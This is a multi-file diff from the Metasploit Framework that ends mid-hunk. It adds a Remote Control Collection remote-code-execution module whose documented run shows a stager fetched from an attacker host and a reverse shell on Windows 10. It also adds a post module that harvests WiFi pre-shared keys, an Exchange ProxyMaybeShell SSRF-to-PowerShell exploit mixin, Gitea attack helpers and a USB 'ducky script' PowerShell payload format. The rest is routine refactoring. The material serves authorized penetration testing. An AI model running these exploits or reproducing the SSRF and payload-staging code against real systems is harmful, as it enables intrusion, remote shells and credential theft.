-  * Exchange 2019 CU9 < 15.2.858.9
+  * Exchange 2019 CU9 < 15.2.858.10

 *Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: April 13, 2021 (KB5001779)][1]*

@@ -87,6 +87,11 @@ The path where you want to write the backdoor. Default: `aspnet_client`

 This is MAPI client version sent in the request.

+### MaxBackendRetries
+
+The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments
+where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.
+
 ## Scenarios

 ### Exchange 2016 CU 19 on Server 2016
@@ -0,0 +1,106 @@
+## Vulnerable Application
+
+This module utilizes the Remote Control Server's, part
+of the Remote Control Collection by Steppschuh, protocol
+to deploy a payload and run it from the server.  This module will only deploy
+a payload if the server is set without a password (default).
+Tested against 3.1.1.12, current at the time of module writing
+
+Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/
+    
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/remote_control_collection_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Remote Mouse.
+
+## Options
+
+### PATH
+
+The location to write the payload to
+Defaults to `%temp%\\` aka `c:\\Windows\\Temp\\` on most systems.
+
+### SLEEP
+
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
+Defaults to `1`.
+
+## Scenarios
+
+###  Remote Control Server 3.1.1.12 on Windows 10
+
+```
+resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_mouse.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (remote_mouse.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (remote_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_mouse_rce) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)
+[+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411
+[*] 1.1.1.1:1978 - Connecting
+[*] 1.1.1.1:1978 - Sending Windows key
+[*] 1.1.1.1:1978 - Opening command prompt
+[*] 1.1.1.1:1978 - Sending stager
+[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/
+[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 1.1.1.1:1978 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 1.1.1.1
+[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
+[*] 1.1.1.1:1978 - Server stopped.
+[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>whoami 
+whoami
+win10prolicense\windows
+
+C:\Users\windows>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+###  Remote Control Server 3.1.1.12 on Windows 10, with a password
+
+Expected to fail.
+
+```
+resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_control_collection.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (remote_control_collection.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (remote_control_collection.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_control_collection_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Connecting and Sending Windows key
+[*] Opening command prompt
+[*] Sending stager
+[*] Using URL: http://2.2.2.2:8080/
+[*] Executing payload
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target
+[*] Exploit completed, but no session was created
+```
@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+This module collects 802-11-Wireless-Security credentials such as
+Access-Point name and Pre-Shared-Key from Linux NetworkManager
+connection configuration files.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a `root` session
+1. Do: `use post/linux/gather/enum_psk`
+1. Do: `set session <session ID>`
+1. Do: `run`
+1. You should receive credentails for wireless connections
+
+
+## Options
+
+### DIR
+
+The path for NetworkManager configuration files (default: `/etc/NetworkManager/system-connections/`)
+
+
+## Scenarios
+
+### Ubuntu 22.04.1 (x86_64)
+
+```
+msf6 > use post/linux/gather/enum_psk 
+msf6 post(linux/gather/enum_psk) > set session 1
+session => 1
+msf6 post(linux/gather/enum_psk) > run
+
+[*] Reading file /etc/NetworkManager/system-connections//Profile 1.nmconnection
+[*] Reading file /etc/NetworkManager/system-connections//test
+
+802-11-wireless-security
+========================
+
+ AccessPoint-Name  PSK
+ ----------------  ---
+ test              1234567890
+
+[+] Credentials stored in: /root/.msf4/loot/20221120081233_default_192.168.200.204_linux.psk.creds_045512.txt
+[*] Post module execution completed
+msf6 post(linux/gather/enum_psk) > 
+```
@@ -6,6 +6,7 @@ This module allows you to collect login information for PureVPN client, specific

 Versions before 6.0 should be vulnerable. For testing purposes, you may find the vulnerable version here:

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 * [https://jumpshare.com/v/LZcpUqJcThY1v7WlH95m](https://jumpshare.com/v/LZcpUqJcThY1v7WlH95m)
 * [https://s3.amazonaws.com/purevpn-dialer-assets/windows/app/purevpn_setup.exe](https://s3.amazonaws.com/purevpn-dialer-assets/windows/app/purevpn_setup.exe)

@@ -116,6 +116,7 @@ _msfvenom_formats_list=(
  'aspx-exe'
  'axis2'
  'dll'
+  'ducky-script-psh'
  'elf'
  'elf-so'
  'exe'
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "6.2.26"
+      VERSION = "6.2.29"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -0,0 +1,207 @@
+# -*- coding: binary -*-
+
+require 'winrm'
+
+module Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super
+
+    register_advanced_options(
+      [
+        Msf::OptFloat.new('MaxBackendRetries', [true, 'The maximum number of times to retry for targeting the backend', 10]),
+      ], self.class
+    )
+  end
+
+  def execute_powershell(cmdlet, args: [], cat: nil)
+    winrm = SSRFWinRMConnection.new({
+      endpoint: full_uri('PowerShell/'),
+      transport: :ssrf,
+      max_backend_retries: datastore['MaxBackendRetries'].to_i,
+      ssrf_proc: proc do |method, uri, opts|
+        uri = "#{uri}?X-Rps-CAT=#{cat}" if cat
+        opts[:data].gsub!(
+          %r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>},
+          "<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>"
+        )
+        opts[:data].gsub!(
+          %r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand="true">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>},
+          "<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>"
+        )
+        res = send_http(method, uri, opts)
+        raise WinRM::WinRMAuthorizationError.new('Server responded with 401 Unauthorized.') if res&.code == 401
+
+        res
+      end
+    })
+
+    successful = true
+    begin
+      winrm.shell(:powershell) do |shell|
+        shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)
+        shell.extend(SSRFWinRMConnection::PowerShell)
+        shell.run({ cmdlet: cmdlet, args: args }) do |stdout, stderr|
+          unless stdout.blank?
+            vprint_line('PSRP output received:')
+            vprint_line(stdout)
+          end
+          unless stderr.blank?
+            successful = false
+            vprint_error('PSRP error received:')
+            vprint_line(stderr)
+          end
+        end
+      end
+    rescue WinRM::WinRMAuthorizationError => e
+      fail_with(Msf::Exploit::Failure::NoAccess, e.message)
+    rescue WinRM::WinRMError => e
+      vprint_error("Exception: #{e.message}")
+      successful = false
+    rescue Msf::Exploit::Failed => e
+      raise e
+    rescue RuntimeError => e
+      print_error("Exception: #{e.inspect}")
+      successful = false
+    end
+
+    successful
+  end
+
+  def send_http(method, uri, opts = {})
+    request = {
+      'method' => method,
+      'uri' => uri,
+      'agent' => datastore['UserAgent'],
+      'ctype' => opts[:ctype],
+      'cookie' => opts[:cookie],
+      'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' }
+    }
+    request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?
+    request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?
+    request = request.merge(opts[:authentication]) unless opts[:authentication].nil?
+
+    begin
+      received = send_request_cgi(request)
+    rescue Errno::ECONNRESET => e
+      fail_with(Msf::Exploit::Failure::Disconnected, 'Server reset the connection.')
+    end
+
+    fail_with(Msf::Exploit::Failure::TimeoutExpired, 'Server did not respond in an expected way.') unless received
+
+    received
+  end
+
+  class XMLTemplate
+    def self.render(template_name, context = nil)
+      file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxymaybeshell', "#{template_name}.xml.erb")
+      template = ::File.binread(file_path)
+      case context
+      when Hash
+        b = binding
+        locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }
+        b.eval(locals.join)
+      when NilClass
+        b = binding
+      else
+        raise ArgumentError
+      end
+      b.eval(Erubi::Engine.new(template).src)
+    end
+  end
+
+  class SSRFWinRMConnection < WinRM::Connection
+    class MessageFactory < WinRM::PSRP::MessageFactory
+      def self.create_pipeline_message(runspace_pool_id, pipeline_id, command)
+        WinRM::PSRP::Message.new(
+          runspace_pool_id,
+          WinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline],
+          XMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]),
+          pipeline_id
+        )
+      end
+    end
+
+    # we have to define this class so we can define our own transport factory that provides one backed by the SSRF
+    # vulnerability
+    class TransportFactory < WinRM::HTTP::TransportFactory
+      class HttpSsrf < WinRM::HTTP::HttpTransport
+        # rubocop:disable Lint/
+        def initialize(endpoint, options)
+          @endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint
+          @ssrf_proc = options[:ssrf_proc]
+          # this tracks the backend target, the PSRP session needs to communicate with one target
+          # this would be the case if Exchange Data Access Group (DAG) is in use
+          @backend = nil
+          @max_backend_attempts = [options.fetch(:max_backend_retries, 10) + 1, 1].max
+        end
+
+        def send_request(message)
+          resp = nil
+          @max_backend_attempts.times do
+            resp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message })
+
+            if resp.code == 500 && resp.headers['X-CalculatedBETarget'] != @backend
+              # retry the request if it failed and the backend was different than the target
+              next
+            end
+
+            break
+          end
+
+          if resp&.code == 200 && @backend.nil?
+            @backend = resp.headers['X-CalculatedBETarget']
+          end
+
+          WinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml
+        end
+
+        attr_reader :backend
+      end
+
+      def create_transport(connection_opts)
+        raise NotImplementedError unless connection_opts[:transport] == :ssrf
+
+        super
+      end
+
+      private
+
+      def init_ssrf_transport(opts)
+        HttpSsrf.new(opts[:endpoint], opts)
+      end
+    end
+
+    module PowerShell
+      def send_command(command, _arguments)
+        command_id = SecureRandom.uuid.to_s.upcase
+        message = MessageFactory.create_pipeline_message(@runspace_id, command_id, command)
+        fragmenter.fragment(message) do |fragment|
+          command_args = [connection_opts, shell_id, command_id, fragment]
+          if fragment.start_fragment
+            resp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build)
+            command_id = REXML::XPath.first(resp_doc, "//*[local-name() = 'CommandId']").text
+          else
+            transport.send_request(WinRM::WSMV::SendData.new(*command_args).build)
+          end
+        end
+
+        command_id
+      end
+    end
+
+    def initialize(connection_opts)
+      # these have to be set to truthy values to pass the option validation, but they're not actually used because hax
+      connection_opts.merge!({ user: :ssrf, password: :ssrf })
+      super(connection_opts)
+    end
+
+    def transport
+      @transport ||= begin
+        transport_factory = TransportFactory.new
+        transport_factory.create_transport(@connection_opts)
+      end
+    end
+  end
+end
@@ -0,0 +1,37 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        # This module provides a way of interacting with gitea installations
+        module Gitea
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Gitea::Base
+          include Msf::Exploit::Remote::HTTP::Gitea::Version
+          include Msf::Exploit::Remote::HTTP::Gitea::Helpers
+          include Msf::Exploit::Remote::HTTP::Gitea::Login
+          include Msf::Exploit::Remote::HTTP::Gitea::Error
+          include Msf::Exploit::Remote::HTTP::Gitea::URIs
+          include Msf::Exploit::Remote::HTTP::Gitea::Repository
+
+          def initialize(info = {})
+            super
+
+            register_options(
+              [
+                Msf::OptString.new('TARGETURI', [true, 'The base path to the gitea application', '/'])
+              ], Msf::Exploit::Remote::HTTP::Gitea
+            )
+
+            register_advanced_options(
+              [
+                Msf::OptBool.new('GITEACHECK', [true, 'Check if the website is a valid Gitea install', true]),
+              ], Msf::Exploit::Remote::HTTP::Gitea
+            )
+          end
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,36 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Base
+  # Checks if the site is online and running gitea
+  #
+  # @return [String,nil] if the site is online and running gitea, nil or raise
+  #   UnknownError, VersionError and ::Rex exceptions otherwise
+  def get_gitea_version
+    unless datastore['GITEACHECK']
+      vprint_status 'Skipping Gitea check...'
+      return true
+    end
+
+    gitea_detect_regexes = [
+      /i_like_gitea=\w+/,
+    ]
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError.new('Check TARGETURI - Unexpected HTTP response code') if res&.code != 200
+
+    if gitea_detect_regexes.none? { |r| res.get_cookies =~ r }
+      raise Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError.new('No web server or gitea instance found')
+    end
+
+    version = gitea_version(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError.new unless version
+    version
+
+  rescue ::Rex::ConnectionError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError.new('Could not connect to the web service')
+  end
+end
@@ -0,0 +1,45 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Error
+  class WebError < ::StandardError
+    def initialize(message: nil)
+      super(message || 'Gitea WebError')
+    end
+  end
+
+  class CsrfError < WebError
+    def initialize
+      super(message: 'Unable to get CSRF token')
+    end
+  end
+
+  class AuthenticationError < WebError
+    def initialize
+      super(message: 'Authentication failed')
+    end
+  end
+
+  class MigrationError < WebError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  class RepositoryError < WebError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  class UnknownError < WebError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  class VersionError < WebError
+    def initialize
+      super(message: 'Unable to determine Gitea version')
+    end
+  end
+end
@@ -0,0 +1,97 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Helpers
+  # Helper methods are private and should not be called by modules
+
+  module_function
+
+  # Returns CSRF token string for Gitea session
+  #
+  # @param res [Rex::Proto::Http::Response] Rex HTTP Response object
+  # @return [String,nil] csrf token if found, nil otherwise
+  def gitea_get_csrf(res)
+    res&.get_html_document&.at('//input[@name="_csrf"]/@value')&.text
+  end
+
+  # Returns string for Gitea repository uid
+  #
+  # @param res [Rex::Proto::Http::Response] Rex HTTP Response object
+  # @return [String,nil] repo uid string if found, nil otherwise
+  def gitea_get_repo_uid(res)
+    res&.get_html_document&.at('//input[@id="uid"]/@value')&.text
+  end
+
+  # Returns string for Gitea service type uri
+  #
+  # @param res [Rex::Proto::Http::Response] Rex HTTP Response object
+  # @return [String,nil] Gitea service type uri string if found, nil otherwise
+  def gitea_get_service_type_uri(res)
+    res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text
+  end
+
+  # Returns the POST data for a Gitea login request
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @param csrf [String] Login csrf
+  # @return [Hash] The post data for vars_post Parameter
+  def gitea_helper_login_post_data(user, pass, csrf)
+    {
+      'user_name' => user,
+      'password' => pass,
+      '_csrf' => csrf
+    }
+  end
+
+  # Returns the POST data for a Gitea create repository request
+  #
+  # @param name [String] Repository name
+  # @param uid [String] Repository uid
+  # @param csrf [String] Login csrf
+  # @return [Hash] The post data for vars_post Parameter
+  def gitea_helper_repo_create_post_data(name, uid, csrf)
+    {
+      'uid' => uid,
+      'auto_init' => 'on',
+      'readme' => 'Default',
+      'repo_name' => name,
+      'trust_model' => 'default',
+      'default_branch' => 'master',
+      '_csrf' => csrf
+    }
+  end
+
+  # Returns the POST data for a Gitea remove repository request
+  #
+  # @param name [String] Repository path
+  # @param csrf [String] Login csrf
+  # @return [Hash] The post data for vars_post Parameter
+  def gitea_helper_repo_remove_post_data(name, csrf)
+    {
+      'action' => 'delete',
+      'repo_name' => name,
+      '_csrf' => csrf
+    }
+  end
+
+  # Returns the POST data for a Gitea migrate repository request
+  #
+  # @param name [String] Repository name
+  # @param uid [String] Repository uid
+  # @param service [String] Service id
+  # @param url [String] Repository name
+  # @param token [String] Repository auth token
+  # @param csrf [String] Login csrf
+  # @return [Hash] The post data for vars_post Parameter
+  def gitea_helper_repo_migrate_post_data(name, uid, service, url, token, csrf)
+    {
+      'uid' => uid,
+      'service' => service,
+      'pull_requests' => 'on',
+      'repo_name' => name,
+      '_csrf' => csrf,
+      'auth_token' => token,
+      'clone_addr' => url
+    }
+  end
+end
@@ -0,0 +1,36 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Login
+  # performs a gitea login
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @param timeout [Integer] The maximum number of seconds to wait before the
+  #   request times out
+  # @raise [CsrfError] if the CSRF could not be retrieved
+  # @raise [AuthenticationError] if the authentication fails
+  # @return [Rex::Proto::Http::Response,AuthenticationError] the HTTP response
+  #   on successful login, raise AuthenticationError otherwise
+  def gitea_login(user, pass, timeout = 20)
+    res = send_request_cgi({
+      'uri' => gitea_url_login,
+      'keep_cookies' => true
+    }, timeout)
+    return nil unless res
+
+    csrf = gitea_get_csrf(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError.new unless csrf
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => gitea_url_login,
+      'vars_post' => gitea_helper_login_post_data(user, pass, csrf),
+      'keep_cookies' => true
+    )
+
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError.new if res&.code != 302
+
+    store_valid_credential(user: user, private: pass)
+    return res
+  end
+end
@@ -0,0 +1,100 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Repository
+  # performs a gitea repository creation
+  #
+  # @param name [String] Repository name
+  # @param timeout [Integer] The maximum number of seconds to wait before the
+  #   request times out
+  # @return [uid,nil] the repository uid as a single string on successful
+  #   creation, nil or raise RepositoryError and CsrfError otherwise
+  def gitea_create_repo(name, timeout = 20)
+    res = send_request_cgi({
+      'uri' => gitea_url_repo_create,
+      'keep_cookies' => true
+    }, timeout)
+    return nil unless res
+
+    uid = gitea_get_repo_uid(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError.new('Unable to get repo uid') unless uid
+
+    csrf = gitea_get_csrf(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError.new unless csrf
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => gitea_url_repo_create,
+      'vars_post' => gitea_helper_repo_create_post_data(name, uid, csrf),
+      'keep_cookies' => true
+    )
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError.new('Unable to create repo') if res&.code != 302
+    return uid
+  end
+
+  # performs a gitea repository migration
+  #
+  # @param name [String] Repository name
+  # @param name [String] Repository uid
+  # @param timeout [Integer] The maximum number of seconds to wait before the
+  #   request times out
+  # @return [Rex::Proto::Http::Response, MigrationError] the HTTP response
+  #   object on successful migration, raise MigrationError otherwise
+  def gitea_migrate_repo(name, uid, url, token, timeout = 20)
+    res = send_request_cgi({
+      'uri' => gitea_url_repo_migrate,
+      'keep_cookies' => true
+    }, timeout)
+    return nil unless res
+
+    uri = gitea_get_service_type_uri(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::WebError.new('Unable to get service type uri') unless uri
+
+    service = Rack::Utils.parse_query(URI.parse(uri).query)['service_type']
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, uri),
+      'keep_cookies' => true
+    )
+    csrf = gitea_get_csrf(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError.new unless csrf
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => gitea_helper_repo_migrate_post_data(name, uid, service, url, token, csrf),
+      'keep_cookies' => true
+    )
+    if res&.code != 302 # possibly triggered by the [migrations] settings
+      err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text
+      raise Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError.new(err)
+    end
+    return res
+  end
+
+  # performs a gitea repository deletion
+  #
+  # @param path [String] Repository path (/username/reponame)
+  # @param timeout [Integer] The maximum number of seconds to wait before the
+  #   request times out
+  # @return [Rex::Proto::Http::Response] the HTTP response object or raise
+  #   CsrfError otherwise
+  def gitea_remove_repo(path, timeout = 20)
+    uri = gitea_url_repo_settings(path)
+    res = send_request_cgi({
+      'uri' => uri,
+      'keep_cookies' => true
+    }, timeout)
+    return nil unless res
+    return res if res&.code == 404 # return res if 404 to handling cleanup
+
+    csrf = gitea_get_csrf(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError.new unless csrf
+
+    name = path.split('/').last
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => gitea_helper_repo_remove_post_data(name, csrf),
+      'keep_cookies' => true
+    )
+  end
+end
@@ -0,0 +1,31 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::URIs
+  # Returns the Gitea Login URL
+  #
+  # @return [String] Gitea Login URL
+  def gitea_url_login
+    normalize_uri(target_uri.path, 'user', 'login')
+  end
+
+  # Returns the Gitea Create repository URL
+  #
+  # @return [String] Gitea Create repository URL
+  def gitea_url_repo_create
+    normalize_uri(target_uri.path, 'repo', 'create')
+  end
+
+  # Returns the Gitea Migrate repository URL
+  #
+  # @return [String] Gitea Migrate repository URL
+  def gitea_url_repo_migrate
+    normalize_uri(target_uri.path, 'repo', 'migrate')
+  end
+
+  # Returns the Gitea Settings repository URL
+  #
+  # @return [String] Gitea Settings repository URL
+  def gitea_url_repo_settings(path)
+    normalize_uri(target_uri.path, path, 'settings')
+  end
+end
@@ -0,0 +1,34 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Version
+  # Powered by Gitea Version
+  GITEA_VERSION_PATTERN = 'Gitea Version: (?<version>[\da-zA-Z.]+)'.freeze
+
+  # Extracts the Gitea version information from base path
+  #
+  # @param res [Rex::Proto::Http::Response] Rex HTTP Response object
+  # @return [String,nil] gitea version if found, nil otherwise
+  def gitea_version(res = nil)
+    # detect version from /
+    version = gitea_version_helper(
+      normalize_uri(target_uri.path),
+      /#{GITEA_VERSION_PATTERN}/,
+      res
+    )
+    return version
+  end
+
+  def gitea_version_helper(url, regex, res)
+    res ||= send_request_cgi({
+      'method' => 'GET',
+      'uri' => url,
+      'keep_cookies' => true
+    })
+    if res
+      match = res.body.match(regex)
+      return match[1] if match
+    end
+
+    nil
+  end
+end
@@ -63,7 +63,7 @@ module Payload::Python::ReverseHttp
    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))

    # Generate the short default URL if we don't have enough space
-    if self.available_space.nil? || required_space > self.available_space
+    if self.available_space.nil? || dynamic_size? || required_space > self.available_space
      uri_req_len = 30
    end

@@ -137,7 +137,12 @@ module SingleCommandShell

    # Send the command to the session's stdin.
    delimiter = "echo #{token}"
-    shell_data = cmd + "#{command_separator}#{delimiter}#{command_termination}"
+    if cmd.strip.end_with?(command_separator)
+      # This command already ends with a delimiter - don't need to add another one
+      shell_data = cmd + "#{delimiter}#{command_termination}"
+    else
+      shell_data = cmd + "#{command_separator}#{delimiter}#{command_termination}"
+    end
    unless @is_echo_shell
      shell_data = "#{delimiter}#{command_separator}#{shell_data}"
    end
@@ -21,8 +21,8 @@ class Msf::Ui::Console::CommandDispatcher::Developer

  def initialize(driver)
    super
-    output, status = modified_files
-    @modified_files = status.success? ? output : []
+    output, is_success = modified_files
+    @modified_files = is_success ? output : []
  end

  def name
@@ -80,10 +80,10 @@ class Msf::Ui::Console::CommandDispatcher::Developer
  end

  def reload_changed_files
-    files, status = modified_files
+    files, is_success = modified_files

-    unless status.success?
-      print_error("Git is not available: #{files.chomp}")
+    unless is_success
+      print_error("Git is not available")
      return
    end

@@ -439,10 +439,15 @@ class Msf::Ui::Console::CommandDispatcher::Developer
  def modified_files
    # Using an array avoids shelling out, so we avoid escaping/quoting
    changed_files = %w[git diff --name-only]
-
-    output, status = Open3.capture2e(*changed_files, chdir: Msf::Config.install_root)
-    output = output.split("\n")
-
-    return output, status
+    begin
+      output, status = Open3.capture2e(*changed_files, chdir: Msf::Config.install_root)
+      is_success = status.success?
+      output = output.split("\n")
+    rescue => e
+      elog(e)
+      output = []
+      is_success = false
+    end
+    return output, is_success
  end
 end
@@ -1437,6 +1437,18 @@ require 'digest/sha1'
                    method: 'reflection')
  end

+  def self.to_powershell_ducky_script(framework, arch, code)
+    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
+    powershell = Rex::Powershell::Command.cmd_psh_payload(code,
+                    arch,
+                    template_path,
+                    encode_final_payload: true,
+                    method: 'reflection')
+    replacers = {}
+    replacers[:var_payload] = powershell
+    read_replace_script_template("to_powershell.ducky_script.template", replacers)
+  end
+
  def self.to_powershell_hta(framework, arch, code)
    template_path = Rex::Powershell::Templates::TEMPLATE_DIR

@@ -2155,6 +2167,8 @@ require 'digest/sha1'
      Msf::Util::EXE.to_powershell_hta(framework, arch, code)
    when 'python-reflection'
      Msf::Util::EXE.to_python_reflection(framework, arch, code, exeopts)
+    when 'ducky-script-psh'
+      Msf::Util::EXE.to_powershell_ducky_script(framework, arch, code)
    end
  end

@@ -2168,6 +2182,7 @@ require 'digest/sha1'
      "aspx-exe",
      "axis2",
      "dll",
+      "ducky-script-psh",
      "elf",
      "elf-so",
      "exe",
@@ -115,7 +115,9 @@ class CommandMapper

    available_modules = [
      ::Rex::Post::Meterpreter,
-      *::Rex::Post::Meterpreter::ExtensionMapper.get_extension_klasses
+      *::Rex::Post::Meterpreter::ExtensionMapper.get_extension_klasses,
+      # Railgun is a special case that defines extra TLV_TYPES inside an extension
+      Rex::Post::Meterpreter::Extensions::Stdapi::Railgun
    ].uniq

    available_modules.each do |mod|
@@ -52,7 +52,8 @@ class TcpServerChannel < Rex::Post::Meterpreter::Channel
      }
    )

-    client_channel = TcpClientChannel.new(client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS, packet, {:sock_params => params})
+    client_channel = TcpClientChannel.new(client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS, packet, sock_params: params)
+    ilog("enqueueing new TCP client with channel id #{cid}")

    @@server_channels[server_channel] ||= ::Queue.new
    @@server_channels[server_channel].enq(client_channel)
@@ -471,6 +471,7 @@ class Console::CommandDispatcher::Stdapi::Net
            return false
          end

+          print_status("Reverse TCP relay created: (remote) #{rhost}:#{rport} -> (local) #{lhost}:#{lport}")
        else
          # Validate parameters
          unless lport && rhost && rport
@@ -486,10 +487,9 @@ class Console::CommandDispatcher::Stdapi::Net
            'MeterpreterRelay'  => true,
            'OnLocalConnection' => Proc.new { |relay, lfd| create_tcp_channel(relay) })
          lport = relay.opts['LocalPort']
+
+          print_status("Forward TCP relay created: (local) #{lhost}:#{lport} -> (remote) #{rhost}:#{rport}")
        end
-
-        print_status("Local TCP relay created: #{lhost}:#{lport} <-> #{rhost}:#{rport}")
-
      # Delete local port forwards
      when 'delete', 'remove', 'del', 'rm'

@@ -7,22 +7,37 @@ module Rex::Proto::MsDtyp
    hide   :reserved0, :reserved1

    # the protocol field id reserved for protocol-specific access rights
-    bit16 :protocol
+    uint16 :protocol

-    bit3  :reserved0
-    bit1  :sy
-    bit1  :wo
-    bit1  :wd
-    bit1  :rc
-    bit1  :de
+    bit3   :reserved0
+    bit1   :sy
+    bit1   :wo
+    bit1   :wd
+    bit1   :rc
+    bit1   :de

-    bit1  :gr
-    bit1  :gw
-    bit1  :gx
-    bit1  :ga
-    bit2  :reserved1
-    bit1  :ma
-    bit1  :as
+    bit1   :gr
